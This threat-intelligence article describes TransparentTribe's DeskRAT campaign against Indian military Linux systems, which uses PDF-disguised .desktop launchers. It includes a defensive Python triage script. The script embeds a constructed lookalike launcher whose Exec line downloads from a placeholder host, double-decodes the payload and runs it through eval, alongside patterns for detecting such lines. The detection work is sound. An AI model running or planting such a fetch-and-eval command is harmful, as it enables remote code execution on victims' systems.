Sunday, November 30

TransparentTribe Attacks Linux-Based Systems of Indian Military Organizations to Deliver DeskRAT


A cyber espionage operation by TransparentTribe, a group with ties to Pakistan, has targeted Linux-based systems within Indian military and defense organizations. The operation, documented by CYFIRMA in July 2025 with activity traced back to June 2025, features a Golang-based remote access trojan known as DeskRAT.

Technical Details

The campaign employs a multi-stage delivery mechanism initiated through phishing emails containing malicious ZIP archives. These archives are disguised with names designed to evade detection, such as “MoM_regarding_Defence_Sectors_by_Secy_Defence.”

Upon extraction, the ZIP files reveal a .desktop launcher file masquerading as a PDF document, complete with a PDF icon. When opened, this file initiates a multi-stage infection chain that establishes persistent remote access to the compromised system.

Sekoia analysts subsequently tracked the campaign's evolution, identifying updated infection chains and new samples in August and September 2025, and wrote YARA rules to track the activity.

Infrastructure and Obfuscation

The technical infrastructure supporting this campaign has evolved from directing targets to ZIP files hosted on cloud services to using dedicated staging servers. This shift indicates an effort to avoid reliance on third-party platforms that may be monitored or suspended by security teams.

The campaign uses an obfuscation technique within the .desktop file: the malicious Bash commands are hidden among comment lines containing PNG image data. The payload sits between large blocks of this image data, which keeps it out of sight during casual inspection.

The Bash one-liner executed when the file is opened drives a multi-stage payload delivery process that includes downloading an encoded binary from a remote server. The downloaded content is decoded twice and then executed through eval, giving the attackers control of the system.

Simultaneously, a decoy PDF document is displayed to mislead users while the RAT establishes itself on the system.
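The lure pattern described in the preceding paragraphs (a Type=Application launcher dressed up as a PDF, padded with comment lines of image data, whose Exec line downloads, double-decodes and evals a remote payload) lends itself to a simple file-level triage check. The script below is an added example written for this article, not code from CYFIRMA, Sekoia or the malware itself. Both .desktop inputs are constructed for the demonstration; the lookalike uses a placeholder domain and is not a real sample from the campaign. The thresholds (Exec length, comment-byte ratio) are assumptions a defender would tune for their environment.

```python
"""Heuristic triage of .desktop files for the lure pattern described above.

A .desktop file is a Linux application launcher: a Type=Application entry whose
Exec= line is run when the user double-clicks it. Lines starting with '#' are
comments and are ignored by the desktop environment, which is what lets an
attacker pad the file with image data.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed benign launcher (not from the campaign).
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=accessories-text-editor
Terminal=false
"""

# Constructed lookalike: PDF name and icon, 300 comment lines of base64-looking
# padding standing in for embedded PNG data, and an Exec line that chains a
# download, two decode steps and eval. The domain is a placeholder.
_PADDING = "\n".join("# " + "iVBORw0KGgoAAAANSUhEUgAAAAUA" * 3 for _ in range(300))
SUSPICIOUS_DESKTOP = (
    "[Desktop Entry]\n"
    "Type=Application\n"
    "Name=MoM_regarding_Defence_Sectors_by_Secy_Defence.pdf\n"
    "Icon=application-pdf\n"
    "Terminal=false\n"
    + _PADDING + "\n"
    'Exec=bash -c "eval $(curl -s http://PLACEHOLDER.invalid/payload | base64 -d | base64 -d)"\n'
)

# Patterns in an Exec= value that rarely appear in legitimate launchers.
SUSPICIOUS_EXEC: List[Tuple[str, str]] = [
    (r"\beval\b", "eval in Exec"),
    (r"base64\s+(-d|--decode)", "base64 decode in Exec"),
    (r"\b(curl|wget)\b", "network download in Exec"),
    (r"\b(ba)?sh\s+-c\b", "inline shell in Exec"),
]


@dataclass
class Verdict:
    findings: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Two or more independent indicators before we raise an alert.
        return len(self.findings) >= 2


def parse_desktop(text: str) -> Tuple[Dict[str, str], int, int]:
    """Return (key=value entries, comment line count, comment byte count)."""
    entries: Dict[str, str] = {}
    comment_lines = comment_bytes = 0
    for line in text.splitlines():
        if line.startswith("#"):
            comment_lines += 1
            comment_bytes += len(line)
        elif "=" in line and not line.startswith("["):
            key, _, value = line.partition("=")
            entries[key.strip()] = value.strip()
    return entries, comment_lines, comment_bytes


def triage_desktop(text: str, max_exec_len: int = 200, comment_ratio: float = 0.5) -> Verdict:
    """Score a .desktop file against the lure pattern; thresholds are assumptions."""
    entries, comment_lines, comment_bytes = parse_desktop(text)
    verdict = Verdict()
    exec_cmd = entries.get("Exec", "")
    for pattern, why in SUSPICIOUS_EXEC:
        if re.search(pattern, exec_cmd):
            verdict.findings.append(why)
    if len(exec_cmd) > max_exec_len:
        verdict.findings.append(f"Exec line is {len(exec_cmd)} chars")
    if entries.get("Type") == "Application":
        name = entries.get("Name", "").lower()
        icon = entries.get("Icon", "").lower()
        if name.endswith((".pdf", ".doc", ".docx")) or "pdf" in icon:
            verdict.findings.append("Application entry styled as a document")
    total = max(len(text), 1)
    if comment_bytes / total > comment_ratio:
        pct = comment_bytes * 100 // total
        verdict.findings.append(f"{comment_lines} comment lines make up {pct}% of the file")
    return verdict


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_DESKTOP), ("lookalike", SUSPICIOUS_DESKTOP)):
        v = triage_desktop(sample)
        print(label, "SUSPICIOUS" if v.suspicious else "clean", v.findings)
```

Run against a directory of user-writable launchers (for example the contents of ~/Desktop and ~/.local/share/applications), this flags files that combine a document-style name or icon with a download-and-eval Exec line or heavy comment padding, while a normal launcher produces no findings.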

DeskRAT Features

DeskRAT communicates with its command and control servers over WebSocket connections, which allow real-time interaction with compromised systems. Its Golang implementation gives it cross-platform portability and enhanced persistence capabilities, making it effective across the diverse Linux environments found within Indian military infrastructure.
